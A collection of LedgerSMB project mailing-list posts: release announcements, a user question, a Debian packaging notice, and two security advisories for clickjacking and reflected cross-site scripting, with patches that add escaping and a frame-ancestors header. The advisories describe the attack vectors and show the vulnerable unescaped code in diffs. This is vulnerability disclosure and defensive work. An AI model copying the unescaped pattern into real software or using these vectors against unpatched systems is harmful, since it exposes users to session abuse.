The LedgerSMB development team is happy to announce yet another new
version of its open source ERP and accounting application.
This release contains the following fixes and improvements:
Changelog for 1.7.25
* Faster GL account tree consistency check
* Maintain consistency between ar/ap/gl and transactions tables on delete
* Fix CSV import of inventory adjustment
For installation instructions and system requirements, see
https://github.com/ledgersmb/LedgerSMB/blob/1.7.25/README.md
The release can be downloaded from our download site at
https://download.ledgersmb.org/f/Releases/1.7.25
The release can be downloaded from GitHub at
https://github.com/ledgersmb/LedgerSMB/releases/tag/1.7.25
Or pulled from Docker Hub using the command
$ docker pull ledgersmb/ledgersmb:1.7.25
These are the sha256 checksums of the uploaded files:
3d457b1f107719baed7210c4ad04140acfb3d16aa5106de2a3862911cc026ecb ledgersmb-1.7.25.tar.gz
4ce17568cd2800ccece2cc7adb0a101c6103a00ffe0c1832784873b382295f42 ledgersmb-1.7.25.tar.gz.asc
Hallo,
I see WebService::HMRC on cpan with a note that it was originally
developed for LedgerSMB, but I can find no reference to it in the list
archives.
Is there an existing implementation of this?
Cheers
Lyn
Unfortunately, the fixes for the security vulnerabilities
released on Monday August 23 regressed some functionalities.
This release fixes those regressions:
Changelog for 1.8.19
* Follow-up for the fix to CVE-2021-3693; fix bulk-posting payments
* Follow-up for the fix to CVE-2021-3693; fix incorrectly backported change
For installation instructions and system requirements, see
https://github.com/ledgersmb/LedgerSMB/blob/1.8.19/README.md
The release can be downloaded from our download site at
https://download.ledgersmb.org/f/Releases/1.8.19
The release can be downloaded from GitHub at
https://github.com/ledgersmb/LedgerSMB/releases/tag/1.8.19
Or pulled from Docker Hub using the command
$ docker pull ledgersmb/ledgersmb:1.8.19
These are the sha256 checksums of the uploaded files:
4f818690b39a974680c6264727ddf3ab445a5db780294cad407869d54ed1fb0c ledgersmb-1.8.19.tar.gz
ffc79cb40181b2cf94fcda63afdfaa2b63fd1703502a86f4bbb76a7bfdcb37a0 ledgersmb-1.8.19.tar.gz.asc
Unfortunately, the fixes for the security vulnerabilities
released on Monday August 23 regressed some functionalities.
This release fixes those regressions:
Changelog for 1.7.34
* Follow-up to fix for CVE-2021-3693 to fix display of search results
* Follow-up for the fix to CVE-2021-3693; fix bulk-posting payments
For installation instructions and system requirements, see
https://github.com/ledgersmb/LedgerSMB/blob/1.7.34/README.md
The release can be downloaded from our download site at
https://download.ledgersmb.org/f/Releases/1.7.34
The release can be downloaded from GitHub at
https://github.com/ledgersmb/LedgerSMB/releases/tag/1.7.34
Or pulled from Docker Hub using the command
$ docker pull ledgersmb/ledgersmb:1.7.34
These are the sha256 checksums of the uploaded files:
729ad60745bb3af14249d5ed952ed8d0110788fd7ed444de1bab61a81c2b9450 ledgersmb-1.7.34.tar.gz
e2beddf724b41603162c0263e24944bafeb2231917aeb094173274ee3671b6b1 ledgersmb-1.7.34.tar.gz.asc
The LedgerSMB development team is happy to announce yet another new
version of its open source ERP and accounting application. This
release contains three fixes for security vulnerabilities. Users are
urged to upgrade as soon as possible. Special thanks go to "ranjit-git",
and sudheendra17, users of the https://huntr.dev/ platform, for disclosing
these issues responsibly to the development team. And to the platform
itself for sponsoring the work of these researchers.
This release contains the following fixes and improvements:
Changelog for 1.8.18
* Check whether HTML comes from a valid source; CVE-2021-3693
* Apply HTML escaping on error messages; CVE-2021-3694 (#5754)
* Fix several issues in `bin/prepare-company-database` (#5769)
* Prevent the application being wrapped in a frame; CVE-2021-3731
For installation instructions and system requirements, see
https://github.com/ledgersmb/LedgerSMB/blob/1.8.18/README.md
The release can be downloaded from our download site at
https://download.ledgersmb.org/f/Releases/1.8.18
The release can be downloaded from GitHub at
https://github.com/ledgersmb/LedgerSMB/releases/tag/1.8.18
Or pulled from Docker Hub using the command
$ docker pull ledgersmb/ledgersmb:1.8.18
These are the sha256 checksums of the uploaded files:
c3ed50b78a0cebc6ef7edfab6a5b1c7b6b5b2f5545bf2d680ad6c3f6cbca5be2 ledgersmb-1.8.18.tar.gz
133fae3563fa1be3eb4cd48ec06347187ba165bbeeb854c92ed03d9c08111ae0 ledgersmb-1.8.18.tar.gz.asc
The LedgerSMB development team is happy to announce yet another new
version of its open source ERP and accounting application. This
release contains three fixes for security vulnerabilities. Users are
urged to upgrade as soon as possible. Special thanks go to "ranjit-git",
and sudheendra17, users of the https://huntr.dev/ platform, for disclosing
these issues responsibly to the development team. And to the platform
itself for sponsoring the work of these researchers.
This release contains the following fixes and improvements:
Changelog for 1.7.33
* Check whether HTML comes from a valid source; CVE-2021-3693
* Apply HTML escaping on error messages; CVE-2021-3694 (#5766)
* Prevent the application being wrapped in a frame; CVE-2021-3731
* Align filters between UI and the database on draft transaction search (#5693)
* Correctly present manual tax and invoice total on reversing invoice (#5721)
* Repeatedly saving a draft invoice pops up an SQL error (#5679)
For installation instructions and system requirements, see
https://github.com/ledgersmb/LedgerSMB/blob/1.7.33/README.md
The release can be downloaded from our download site at
https://download.ledgersmb.org/f/Releases/1.7.33
The release can be downloaded from GitHub at
https://github.com/ledgersmb/LedgerSMB/releases/tag/1.7.33
Or pulled from Docker Hub using the command
$ docker pull ledgersmb/ledgersmb:1.7.33
These are the sha256 checksums of the uploaded files:
15dcc79a42fd17f12d01e1cc4b36ddd25e8dbe776ffe1b9867a1ad9e42bfabc0 ledgersmb-1.7.33.tar.gz
73eadc3bf2c2b3d2abeabe52ccc3db03dd5e46599d4a84a3a72ef10105d6ab36 ledgersmb-1.7.33.tar.gz.asc
On August 20th, the LedgerSMB project was advised of a security
vulnerability in the code. Please see below our security advisory.
Insufficient protection against 'clickjacking'
Summary:
========
LedgerSMB does not sufficiently guard against being wrapped by
other sites, making it vulnerable to 'clickjacking. This allows
an attacker to trick a targetted user to execute unintended actions.
Known vulnerable:
=================
All of:
- 1.1.0 upto 1.1.12 (including)
- 1.2.0 upto 1.2.26 (including)
- 1.3.0 upto 1.3.47 (including)
- 1.4.0 upto 1.4.42 (including)
- 1.5.0 upto 1.5.30 (including)
- 1.6.0 upto 1.6.33 (including)
- 1.7.0 upto 1.7.32 (including)
- 1.8.0 upto 1.8.17 (including)
Known fixed:
============
- 1.7.33
- 1.8.18
Details:
========
In a clickjacking attack, an attacker (invisibly) wraps the vulnerable
site in his own site, carefully placing elements of his own site over
elements of the wrapped site, tricking the user into performing unintended
actions on the vulnerable site. More information on clickjacking is on the
OWASP page at https://owasp.org/www-community/attacks/Clickjacking
The lack of protection dates back to version 1.0, although it must
be noted that mitigation measures were first available in browsers
as of 2011 -- the year of the release of 1.3.0.
Severity:
=========
CVSSv3.1 Base Score: 5.9 (Medium)
CVSSv3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N
Recommendations:
================
We recommend all users to upgrade to known-fixed versions. Versions prior
to 1.7 are end-of-life and will not receive security fixes from the
LedgerSMB project.
Users who cannot upgrade, may apply the included patches or are advised
to contact a vendor for custom support.
As a workaround, administrators may configure their webservers to add
the Content-Security-Policy header as documented in the content
security policy site at https://content-security-policy.com/#server.
References:
===========
CVE-2021-3731 (LedgerSMB)
https://ledgersmb.org/cve-2021-3731-clickjackinghttps://huntr.dev/bounties/5664331d-f5f8-4412-8566-408f8655888a/
Reported by:
============
sudheendra17, user of the huntr.dev platform
Patches:
========
Patch for LedgerSMB 1.8 (1.8.0 upto 1.8.17, including):
-------------------------------------------------------
[[[
diff --git a/lib/LedgerSMB/PSGI.pm b/lib/LedgerSMB/PSGI.pm
index b0b20a95b..a4785a9f1 100644
--- a/lib/LedgerSMB/PSGI.pm
+++ b/lib/LedgerSMB/PSGI.pm
@@ -122,6 +122,9 @@ sub old_app {
return Plack::Util::response_cb(
$handler->($env),
sub {
+ Plack::Util::header_set($_[0]->[1],
+ 'Content-Security-Policy',
+ q{frame-ancestors 'self'});
if (not Plack::Util::header_exists($_[0]->[1],
'X-LedgerSMB-App-Content')) {
Plack::Util::header_push($_[0]->[1],
@@ -179,6 +182,9 @@ sub psgi_app {
}
};
+ Plack::Util::header_set($res->[1],
+ 'Content-Security-Policy',
+ q{frame-ancestors 'self'});
return $res;
}
]]]
Patch for LedgerSMB 1.7 (1.7.0 upto 1.7.32, including):
-------------------------------------------------------
[[[
diff --git a/lib/LedgerSMB/PSGI.pm b/lib/LedgerSMB/PSGI.pm
index ec8be07f1..bcb478524 100644
--- a/lib/LedgerSMB/PSGI.pm
+++ b/lib/LedgerSMB/PSGI.pm
@@ -91,6 +91,9 @@ sub old_app {
return Plack::Util::response_cb(
$handler->(@_),
sub {
+ Plack::Util::header_set($_[0]->[1],
+ 'Content-Security-Policy',
+ q{frame-ancestors 'self'});
if (not Plack::Util::header_exists($_[0]->[1],
'X-LedgerSMB-App-Content')) {
Plack::Util::header_push($_[0]->[1],
@@ -159,6 +162,9 @@ sub psgi_app {
}
};
+ Plack::Util::header_set($res->[1],
+ 'Content-Security-Policy',
+ q{frame-ancestors 'self'});
return $res;
}
]]]
--
Bye,
Erik.
http://efficito.com -- Hosted accounting and ERP.
Robust and Flexible. No vendor lock-in.
On August 4th, the LedgerSMB project was advised of a security
vulnerability in the code. Please see below our security advisory.
Reflected cross-site scripting of authenticated users in LedgerSMB
Summary:
========
LedgerSMB does not sufficiently HTML-encode error messages sent to the
browser. By sending a specially crafted URL to an authenticated user,
this flaw can be abused for remote code execution and information
disclosure.
Known vulnerable:
=================
All of:
- 1.1.0 upto 1.1.12 (including)
- 1.2.0 upto 1.2.26 (including)
- 1.3.0 upto 1.3.47 (including)
- 1.4.0 upto 1.4.42 (including)
- 1.5.0 upto 1.5.30 (including)
- 1.6.0 upto 1.6.33 (including)
- 1.7.0 upto 1.7.32 (including)
- 1.8.0 upto 1.8.17 (including)
Known fixed:
============
- 1.7.33
- 1.8.18
Details:
========
When encountering an error, LedgerSMB sends the user feedback which may
include user-provided input. This input was not sufficiently sanitized
before being included in the error report. This allows an attacker inject
a script in the error response page by send a specially crafted URL to an
authenticated user. As the error page itself does not contain any
sensitive
information, a sophisticated payload in addition to targetting a
sufficiently
privileged user, is required for information disclosure.
Proper audit control and separation of duties limit Integrity impact of
the attack vector.
The vulnerable code to provide this user-feedback dates back to version
1.0.
Please note that not error messages are vulnerable to this attack as not
all
messages report the problematic input to the user.
Severity:
=========
CVSSv3.1 Base Score: 8.2 (High)
CVSSv3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
Recommendations:
================
We recommend all users to upgrade to known-fixed versions. Versions prior
to 1.7 are end-of-life and will not receive security fixes from the
LedgerSMB project.
Users who cannot upgrade, may apply the included patches or are advised
to contact a vendor for custom support.
There are no workarounds available for this vulnerability.
References:
===========
CVE-2021-3694 (LedgerSMB)
https://ledgersmb.org/cve-2021-3694-cross-site-scriptinghttps://huntr.dev/bounties/ef7f4cf7-3a81-4516-b261-f5b6ac21430c/
Reported by:
============
ranjit-git, user of the huntr.dev platform
Patches:
========
Patch for LedgerSMB 1.8 (1.8.0 upto 1.8.17, including):
-------------------------------------------------------
[[[
diff --git a/lib/LedgerSMB/PSGI/Util.pm b/lib/LedgerSMB/PSGI/Util.pm
index 11c01918f..bf443d886 100644
--- a/lib/LedgerSMB/PSGI/Util.pm
+++ b/lib/LedgerSMB/PSGI/Util.pm
@@ -24,6 +24,7 @@ use strict;
use warnings;
use Carp;
+use HTML::Escape;
use HTTP::Status qw( HTTP_OK HTTP_INTERNAL_SERVER_ERROR HTTP_SEE_OTHER
HTTP_BAD_REQUEST );
@@ -41,7 +42,7 @@ Returns a standard error representation for HTTP status
500
sub internal_server_error {
- my ($msg, $title, $company, $dbversion) = @_;
+ my ($msg, $title, $company, $dbversion) = map { escape_html($_ // '')
} @_;
$title //= 'Error!';
$msg =~ s/\n/<br>/g;
diff --git a/old/lib/LedgerSMB/oldHandler.pm
b/old/lib/LedgerSMB/oldHandler.pm
index 1db966406..848eeb75c 100644
--- a/old/lib/LedgerSMB/oldHandler.pm
+++ b/old/lib/LedgerSMB/oldHandler.pm
@@ -57,6 +57,7 @@ use LedgerSMB::Sysconfig;
use Cookie::Baker;
use Digest::MD5;
+use HTML::Escape;
use Log::Log4perl;
use Try::Tiny;
@@ -184,14 +185,17 @@ sub handle {
sub _error {
my ($form, $msg, $status) = @_;
$msg = "? _error" if !defined $msg;
+ my $html_msg = escape_html($msg);
+ my $html_dbversion = escape_html($form->{dbversion});
+ my $html_company = escape_html($form->{company});
$status = 500 if ! defined $status;
print qq|Status: $status ISE
Content-Type: text/html; charset=utf-8
<html>
-<body><h2 class="error">Error!</h2> <p><b>$msg</b></p>
-<p>dbversion: $form->{dbversion}, company: $form->{company}</p>
+<body><h2 class="error">Error!</h2> <p><b>$html_msg</b></p>
+<p>dbversion: $html_dbversion, company: $html_company</p>
</body>
</html>
|;
]]]
Patch for LedgerSMB 1.7 (1.7.0 upto 1.7.32, including):
-------------------------------------------------------
[[[
diff --git a/lib/LedgerSMB/PSGI/Util.pm b/lib/LedgerSMB/PSGI/Util.pm
index 2d6195d69..b716a01c4 100644
--- a/lib/LedgerSMB/PSGI/Util.pm
+++ b/lib/LedgerSMB/PSGI/Util.pm
@@ -24,6 +24,7 @@ use strict;
use warnings;
use Carp;
+use HTML::Escape;
use HTTP::Status qw( HTTP_OK HTTP_INTERNAL_SERVER_ERROR HTTP_SEE_OTHER
HTTP_UNAUTHORIZED );
@@ -41,7 +42,7 @@ Returns a standard error representation for HTTP status
500
sub internal_server_error {
- my ($msg, $title, $company, $dbversion) = @_;
+ my ($msg, $title, $company, $dbversion) = map { escape_html($_ // '')
} @_;
$title //= 'Error!';
$msg =~ s/\n/<br>/g;
diff --git a/old/bin/old-handler.pl b/old/bin/old-handler.pl
index 24fa7a0a0..87864fc7e 100644
--- a/old/bin/old-handler.pl
+++ b/old/bin/old-handler.pl
@@ -187,14 +187,16 @@ $form->{dbh}->disconnect() if defined $form->{dbh};
sub _error {
my ($form, $msg, $status) = @_;
$msg = "? _error" if !defined $msg;
+ my $html_msg = escape_html($msg);
+ my $html_dbversion = escape_html($form->{dbversion});
+ my $html_company = escape_html($form->{company});
$status = 500 if ! defined $status;
print qq|Status: $status ISE
Content-Type: text/html; charset=utf-8
-
<html>
-<body><h2 class="error">Error!</h2> <p><b>$msg</b></p>
-<p>dbversion: $form->{dbversion}, company: $form->{company}</p>
+<body><h2 class="error">Error!</h2> <p><b>$html_msg</b></p>
+<p>dbversion: $html_dbversion, company: $html_company</p>
</body>
</html>
|;
]]]
--
Bye,
Erik.
http://efficito.com -- Hosted accounting and ERP.
Robust and Flexible. No vendor lock-in.
Hi all,
On August 14, Debian released the 11th version of its Linux distribution:
Bullseye. Where the previous version (10 / Buster) had seriously broken
packages for LedgerSMB -- to the extent that you could say that LedgerSMB
wasn't really included at all --, we were just in time before the code
freeze to submit fixed packages to Bullseye. The fixed packages quickly
migrated to various Debian-based distributions, including Ubuntu (which
included the fixed package in 21.04 / hirsute).
Sending this mail to notify anybody who tried to install LedgerSMB using
the distribution-supplied packages on Debian or Ubuntu: the packages in the
latest stable repositories should be working correctly again!
PS: While the packages are back in a working state, the current release is
1.6.9. The goal for Debian 12 (Bookworm) is to deliver a close-to-current
version of LedgerSMB when it releases.
--
Bye,
Erik.
http://efficito.com -- Hosted accounting and ERP.
Robust and Flexible. No vendor lock-in.